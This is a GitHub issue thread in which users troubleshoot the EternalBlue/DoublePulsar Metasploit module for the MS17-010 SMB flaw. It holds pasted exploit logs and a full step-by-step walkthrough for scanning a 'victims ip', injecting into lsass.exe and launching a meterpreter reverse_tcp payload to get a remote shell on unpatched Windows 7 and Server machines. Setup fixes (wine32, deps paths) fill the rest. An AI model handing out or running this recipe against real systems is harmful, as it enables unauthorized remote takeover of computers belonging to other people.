Eternalblue-Doublepulsar-Metasploit
Eternalblue-Doublepulsar-Metasploit copied to clipboard
Telefonica
Bad EXE format
[] Started reverse TCP handler on 192.168.1.150:4444 [] 192.168.1.31:445 - Generating Eternalblue XML data [] 192.168.1.31:445 - Generating Doublepulsar XML data [] 192.168.1.31:445 - Generating payload DLL for Doublepulsar [] 192.168.1.31:445 - Writing DLL in /root/.wine64/drive_c/eternal11.dll [] 192.168.1.31:445 - Launching Eternalblue... wine: Bad EXE format for Z:\opt\metasploit-framework\modules\exploits\windows\smb\Eternalblue-Doublepulsar-Metasploit\deps\Eternalblue-2.2.0.exe. [-] 192.168.1.31:445 - Are you sure it's vulnerable? [] 192.168.1.31:445 - Launching Doublepulsar... Application tried to create a window, but no driver could be loaded. Make sure that your X server is running and that $DISPLAY is set correctly. wine: Bad EXE format for Z:\opt\metasploit-framework\modules\exploits\windows\smb\Eternalblue-Doublepulsar-Metasploit\deps\Doublepulsar-1.3.1.exe. [-] 192.168.1.31:445 - Oops, something was wrong! [] Exploit completed, but no session was created.
@syrius01 Just as you gave the command "set RHOST xxx.xxx.xxx.xx" run to the path of the deps directory: Example: "set eternalbluepath / root / xxxx / deps
also have this problem , how to solve ?
root@kali:~# uname -ar Linux kali 4.0.0-kali1-amd64 #1 SMP Debian 4.0.4-1+kali2 (2015-06-03) x86_64 GNU/Linux
root@kali:~# wine --version wine-1.7.33
Got the same error running: Kali 4.9.0-kali3-amd64
Seems like wine32 was removed from the apt-get repository in recent Kali versions (2017), and even when a path is added, you receive the error:
The following packages have unmet dependencies: wine32:i386 : Depends: libc6:i386 (>= 2.17) but it is not installable Depends: libwine:i386 (= 1.8.7-2~bpo8+1) but it is not going to be installed Recommends: wine:i386 (= 1.8.7-2~bpo8+1) E: Unable to correct problems, you have held broken packages.
Any plans to make the .exe files available for wine 64-bit?
i have this issue
msf exploit(eternalblue_doublepulsar) > exploit
[] Started reverse TCP handler on 192.168.226.130:4444 [] 1.1.1.1:445 - Generating Eternalblue XML data cp: cannot stat '/root/Desktop/Eternalblue-Doublepulsar-Metasploit/deps/Eternalblue-2.2.0.Skeleton.xml': No such file or directory sed: can't read /root/Desktop/Eternalblue-Doublepulsar-Metasploit/deps/Eternalblue-2.2.0.xml: No such file or directory sed: can't read /root/Desktop/Eternalblue-Doublepulsar-Metasploit/deps/Eternalblue-2.2.0.xml: No such file or directory sed: can't read /root/Desktop/Eternalblue-Doublepulsar-Metasploit/deps/Eternalblue-2.2.0.xml: No such file or directory sed: can't read /root/Desktop/Eternalblue-Doublepulsar-Metasploit/deps/Eternalblue-2.2.0.xml: No such file or directory [] 1.1.1.1:445 - Generating Doublepulsar XML data cp: cannot stat '/root/Desktop/Eternalblue-Doublepulsar-Metasploit/deps/Doublepulsar-1.3.1.Skeleton.xml': No such file or directory sed: can't read /root/Desktop/Eternalblue-Doublepulsar-Metasploit/deps/Doublepulsar-1.3.1.xml: No such file or directory sed: can't read /root/Desktop/Eternalblue-Doublepulsar-Metasploit/deps/Doublepulsar-1.3.1.xml: No such file or directory sed: can't read /root/Desktop/Eternalblue-Doublepulsar-Metasploit/deps/Doublepulsar-1.3.1.xml: No such file or directory sed: can't read /root/Desktop/Eternalblue-Doublepulsar-Metasploit/deps/Doublepulsar-1.3.1.xml: No such file or directory sed: can't read /root/Desktop/Eternalblue-Doublepulsar-Metasploit/deps/Doublepulsar-1.3.1.xml: No such file or directory sed: can't read /root/Desktop/Eternalblue-Doublepulsar-Metasploit/deps/Doublepulsar-1.3.1.xml: No such file or directory [] 1.1.1.1:445 - Generating payload DLL for Doublepulsar [] 1.1.1.1:445 - Writing DLL in /root/.wine/drive_c/eternal11.dll [] 1.1.1.1:445 - Launching Eternalblue... sh: 1: cd: can't cd to /root/Desktop/Eternalblue-Doublepulsar-Metasploit/deps wine: cannot find L"C:\windows\system32\Eternalblue-2.2.0.exe" [-] 1.1.1.1:445 - Are you sure it's vulnerable? [] 1.1.1.1:445 - Launching Doublepulsar... sh: 1: cd: can't cd to /root/Desktop/Eternalblue-Doublepulsar-Metasploit/deps wine: cannot find L"C:\windows\system32\Doublepulsar-1.3.1.exe" [-] 1.1.1.1:445 - Oops, something was wrong! [] Exploit completed, but no session was created. msf exploit(eternalblue_doublepulsar) >
@krishna1972 how did you fix that? I am getting same error as @italy2010 Tried to move the Eternalblue-Doublepulsar-Metasploit/deps into other folder, but still not fixed.
ok so I changed /root/Desktop/Eternalblue-Doublepulsar-Metasploit/deps/Doublepulsar- al I needed because the eternalblue-doublepulsar file was in my downloads file(path) so /root/Downloads/Eternalblue-Doublepulsar/deps that is both paths. next i changed the processinject to lsass.exe because it is a x64, then the payload is payload windows/x64/meterpeter/reverse_tcp that was pretty much it. please let me know how you get on. thanks
first: set correct file path,dir path, if file or dir path not exits , you can use mkdir command create it and move these file to you create dir !
- if not work:
- Change: PROCESSINJECT wlms.exe/lsass.exe or other
- use exploit/windows/smb/eternalblue_doublepulsar
- set listen port(use multi/handler)
- set payload windows/x64/meterpreter/reverse_tcp (64bit)
- set payload windows/meterpreter/reverse_tcp (32bit)
I was successful !!!
Yep that's it
Sent from Krishna's iPhone 6s Plus
On 5/07/2017, at 1:56 PM, ↓↓↓↓↓↓↓↓↓↓ [email protected] wrote:
first: set correct file path,dir path, if file or dir path not exits , you can use mkdir command create it and move these file to you create dir !
if not work: Change: PROCESSINJECT wlms.exe/lsass.exe or other use exploit/windows/smb/eternalblue_doublepulsar set listen port(use multi/handler) set payload windows/x64/meterpreter/reverse_tcp (64bit) set payload windows/meterpreter/reverse_tcp (32bit) I was successful !!!
— You are receiving this because you were mentioned. Reply to this email directly, view it on GitHub, or mute the thread.
have did that, and also follow based on this ref : http://www.hackingarticles.in/exploit-remote-windows-pc-eternalblue-doublepulsar-exploit-metasploit/
but somehow still getting same error
[] Started reverse TCP handler on 192.168.119.137:4444 [] 192.168.1.210:445 - Generating Eternalblue XML data cp: cannot stat '/root/Desktop/Eternalblue_Doublepulsar-Metasploit/deps/Eternalblue-2.2.0.Skeleton.xml': No such file or directory sed: can't read /root/Desktop/Eternalblue_Doublepulsar-Metasploit/deps/Eternalblue-2.2.0.xml: No such file or directory sed: can't read /root/Desktop/Eternalblue_Doublepulsar-Metasploit/deps/Eternalblue-2.2.0.xml: No such file or directory sed: can't read /root/Desktop/Eternalblue_Doublepulsar-Metasploit/deps/Eternalblue-2.2.0.xml: No such file or directory sed: can't read /root/Desktop/Eternalblue_Doublepulsar-Metasploit/deps/Eternalblue-2.2.0.xml: No such file or directory [] 192.168.1.210:445 - Generating Doublepulsar XML data cp: cannot stat '/root/Desktop/Eternalblue_Doublepulsar-Metasploit/deps/Doublepulsar-1.3.1.Skeleton.xml': No such file or directory sed: can't read /root/Desktop/Eternalblue_Doublepulsar-Metasploit/deps/Doublepulsar-1.3.1.xml: No such file or directory sed: can't read /root/Desktop/Eternalblue_Doublepulsar-Metasploit/deps/Doublepulsar-1.3.1.xml: No such file or directory sed: can't read /root/Desktop/Eternalblue_Doublepulsar-Metasploit/deps/Doublepulsar-1.3.1.xml: No such file or directory sed: can't read /root/Desktop/Eternalblue_Doublepulsar-Metasploit/deps/Doublepulsar-1.3.1.xml: No such file or directory sed: can't read /root/Desktop/Eternalblue_Doublepulsar-Metasploit/deps/Doublepulsar-1.3.1.xml: No such file or directory sed: can't read /root/Desktop/Eternalblue_Doublepulsar-Metasploit/deps/Doublepulsar-1.3.1.xml: No such file or directory [] 192.168.1.210:445 - Generating payload DLL for Doublepulsar [] 192.168.1.210:445 - Writing DLL in /root/.wine/drive_c/eternal11.dll [] 192.168.1.210:445 - Launching Eternalblue... sh: 1: cd: can't cd to /root/Desktop/Eternalblue_Doublepulsar-Metasploit/deps wine: cannot find L"C:\windows\system32\Eternalblue-2.2.0.exe" [-] 192.168.1.210:445 - Are you sure it's vulnerable? [] 192.168.1.210:445 - Launching Doublepulsar... sh: 1: cd: can't cd to /root/Desktop/Eternalblue_Doublepulsar-Metasploit/deps wine: cannot find L"C:\windows\system32\Doublepulsar-1.3.1.exe" [-] 192.168.1.210:445 - Oops, something was wrong! [] Exploit completed, but no session was created.
1st Go to your terminal then > service postgresql start 2nd Go to your foler where your eternalblue-doublepulsar is then go to deps in your eternalblue-doublepulsar 3 go and open msfconsole in another terminal msf > use auxiliary/scanner/smb/smb_ms17_010 msf auxiliary(smb_ms17_010) > set RHOSTS victims ip RHOSTS => victims ip msf auxiliary(smb_ms17_010) > options
Module options (auxiliary/scanner/smb/smb_ms17_010):
Name Current Setting Required Description
RHOSTS victims ip yes The target address range or CIDR identifier RPORT 445 yes The SMB service port (TCP) SMBDomain . no The Windows domain to use for authentication SMBPass no The password for the specified username SMBUser no The username to authenticate as THREADS 1 yes The number of concurrent threads msf auxiliary(smb_ms17_010) > back msf > use exploit/windows/smb/eternalblue_doublepulsar msf exploit(eternalblue_doublepulsar) > options
Module options (exploit/windows/smb/eternalblue_doublepulsar):
Name Current Setting Required Description
DOUBLEPULSARPATH /root/Eternalblue-Doublepulsar-Metasploit/deps/ yes Path directory of Doublepulsar ETERNALBLUEPATH /root/Eternalblue-Doublepulsar-Metasploit/deps/ yes Path directory of Eternalblue PROCESSINJECT wlms.exe yes Name of process to inject into (Change to lsass.exe for x64) RHOST yes The target address RPORT 445 yes The SMB service port (TCP) TARGETARCHITECTURE x86 yes Target Architecture (Accepted: x86, x64) WINEPATH /root/.wine/drive_c/ yes WINE drive_c path
Exploit target:
Id Name
8 Windows 7 (all services pack) (x86) (x64) msf exploit(eternalblue_doublepulsar) > set DOUBLEPULSARPATH /root/Downloads/Eternalblue-Doublepulsar-Metasploit/deps DOUBLEPULSARPATH => /root/Downloads/Eternalblue-Doublepulsar-Metasploit/deps msf exploit(eternalblue_doublepulsar) > set ETERNALBLUEPATH /root/Downloads/Eternalblue-Doublepulsar-Metasploit/deps ETERNALBLUEPATH => /root/Downloads/Eternalblue-Doublepulsar-Metasploit/deps msf exploit(eternalblue_doublepulsar) > set PROCESSINJECT lsass.exe PROCESSINJECT => lsass.exe msf exploit(eternalblue_doublepulsar) > set RHOSTvictims ip RHOST =>victims ip msf exploit(eternalblue_doublepulsar) > set TARGETARCHITECTURE x64
msf exploit(eternalblue_doublepulsar) > show targets
Exploit targets:
Id Name
0 Windows XP (all services pack) (x86) (x64) 1 Windows Server 2003 SP0 (x86) 2 Windows Server 2003 SP1/SP2 (x86) 3 Windows Server 2003 (x64) 4 Windows Vista (x86) 5 Windows Vista (x64) 6 Windows Server 2008 (x86) 7 Windows Server 2008 R2 (x86) (x64) 8 Windows 7 (all services pack) (x86) (x64) msf exploit(eternalblue_doublepulsar) > set target 8 target => 8 msf exploit(eternalblue_doublepulsar) > set LHOST your ip LHOST => your ip msf exploit(eternalblue_doublepulsar) > set PAYLOAD windows/x64/meterpreter/reverse_tcp PAYLOAD => windows/x64/meterpreter/reverse_tcp msf exploit(eternalblue_doublepulsar) > msf exploit(eternalblue_doublepulsar) > exploit
that is everything.
@krishna1972 Ok i just follow through it. Previous error was gone, Thanks
[] Started reverse TCP handler on 192.168.119.137:4444 [] 192.168.1.210:445 - Generating Eternalblue XML data [] 192.168.1.210:445 - Generating Doublepulsar XML data [] 192.168.1.210:445 - Generating payload DLL for Doublepulsar [] 192.168.1.210:445 - Writing DLL in /root/.wine/drive_c/eternal11.dll [] 192.168.1.210:445 - Launching Eternalblue... [-] Error getting output back from Core; aborting... [-] 192.168.1.210:445 - Are you sure it's vulnerable? [] 192.168.1.210:445 - Launching Doublepulsar... [-] 192.168.1.210:445 - Oops, something was wrong! [] Exploit completed, but no session was created. msf exploit(eternalblue_doublepulsar) >
But come up with this error, I will try to use other target later and see the result.
Thanks again
hello i cant make this work ive tryed everithing you mentioned above and i still get the following message [] Started reverse TCP handler on 192.168.0.13:4444 [] 192.168.1.16:445 - Generating Eternalblue XML data [] 192.168.1.16:445 - Generating Doublepulsar XML data [] 192.168.1.16:445 - Generating payload DLL for Doublepulsar [] 192.168.1.16:445 - Writing DLL in /home/orphan/.wine/drive_ceternal11.dll [] 192.168.1.16:445 - Launching Eternalblue... err:menubuilder:init_xdg error looking up the desktop directory fixme:ntdll:find_reg_tz_info Can't find matching timezone information in the registry for bias 180, std (d/m/y): 0/00/0000, dlt (d/m/y): 0/00/0000 [-] Error getting output back from Core; aborting... [-] 192.168.1.16:445 - Are you sure it's vulnerable? [] 192.168.1.16:445 - Launching Doublepulsar... fixme:ntdll:find_reg_tz_info Can't find matching timezone information in the registry for bias 180, std (d/m/y): 0/00/0000, dlt (d/m/y): 0/00/0000 [-] 192.168.1.16:445 - Oops, something was wrong! [] Exploit completed, but no session was created.
what do i do wrong? THANKS
Where have you saved eternal blue-doublepulsar-Metasploit to?
On 3/02/2018, at 8:01 AM, GRAVEDDIGER [email protected] wrote:
hello i cant make this work ive tryed everithing you mentioned above and i still get the following message [] Started reverse TCP handler on 192.168.0.13:4444 [] 192.168.1.16:445 - Generating Eternalblue XML data [] 192.168.1.16:445 - Generating Doublepulsar XML data [] 192.168.1.16:445 - Generating payload DLL for Doublepulsar [] 192.168.1.16:445 - Writing DLL in /home/orphan/.wine/drive_ceternal11.dll [] 192.168.1.16:445 - Launching Eternalblue... err:menubuilder:init_xdg error looking up the desktop directory fixme:ntdll:find_reg_tz_info Can't find matching timezone information in the registry for bias 180, std (d/m/y): 0/00/0000, dlt (d/m/y): 0/00/0000 [-] Error getting output back from Core; aborting... [-] 192.168.1.16:445 - Are you sure it's vulnerable? [] 192.168.1.16:445 - Launching Doublepulsar... fixme:ntdll:find_reg_tz_info Can't find matching timezone information in the registry for bias 180, std (d/m/y): 0/00/0000, dlt (d/m/y): 0/00/0000 [-] 192.168.1.16:445 - Oops, something was wrong! [] Exploit completed, but no session was created.
what do i do wrong? THANKS
— You are receiving this because you were mentioned. Reply to this email directly, view it on GitHub https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit/issues/4#issuecomment-362675023, or mute the thread https://github.com/notifications/unsubscribe-auth/AUK1igZFjrHQ_LNNcgaaL9co1xtbh3Bjks5tQ1uVgaJpZM4NKZAj.
@krishna1972 thanks for your reply ive saved eternalblue in /opt/metasploit-framework/embedded/framework/modules/exploits/windows/smb/deps and in /root/Eternalblue-Doublepulsar-Metasploit im runing backbox 5
Ok for starters I use kali Linux. Then I went to git hub and downloaded the eternalblue-doublepulsar Get rid of opt/././. Only use the root with deps at end.
Sent from Krishna's iPhone 6s Plus
On 6/02/2018, at 05:59, GRAVEDDIGER [email protected] wrote:
@krishna1972 thanks for your reply ive saved eternalblue in /opt/metasploit-framework/embedded/framework/modules/exploits/windows/smb/deps and in /root/Eternalblue-Doublepulsar-Metasploit im runing backbox 5
— You are receiving this because you were mentioned. Reply to this email directly, view it on GitHub, or mute the thread.
I fixed this issue by adding to my kali support to both archs x86 and x64 and also by updating the system and getting wine32 installed. See below:
#dpkg --add-architecture i386 && apt-get update && apt-get install wine32
